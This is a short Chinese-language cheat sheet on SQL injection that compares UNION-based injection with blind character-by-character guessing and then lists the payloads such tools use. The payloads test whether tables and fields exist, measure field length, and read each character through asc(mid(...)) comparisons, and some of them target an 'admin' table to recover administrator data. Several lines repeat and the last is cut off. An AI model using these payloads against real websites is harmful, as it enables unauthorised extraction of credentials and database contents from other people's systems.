联合查询↓

优势：方便 快捷

缺点：兼容性相对较差。

逐字猜解法↓

优势：兼容绝大多数注入点。

缺点：很慢。

工具所使用的语句↓

猜字段↓---------------------------------------------------------------------------------------------------------------------------------

and exists (select * from 表名) 获取表名

and exists (select 字段名 from 表名) 获取字段名

and (select top 1 len(字段名) from 表名)=5 获取指定字段的内容长度

//len(password) =5 当前字段长度与数据库内进行对比。

and (select top 1 asc(mid(字段名,位数,1)) from 表)=97 获取字段内容第一位

//这里只是改变一个查询起始位置 and (select top 1 asc(mid(字段名,2,1)) from 表)=97 获取字段内容第二位

and exists (select * from 表名) 获取表名

and exists (select 字段名 from 表名) 获取字段名

and (select top 1 len(字段名) from 表名)=5 获取指定字段的内容长度

and (select top 1 len(admin) from admin)>4

and (select top 1 asc(mid(字段名,位数,1)) from 表)=97 获取字段内容第一位

and (select top 1 asc(mid(admin,1,1)) from admin)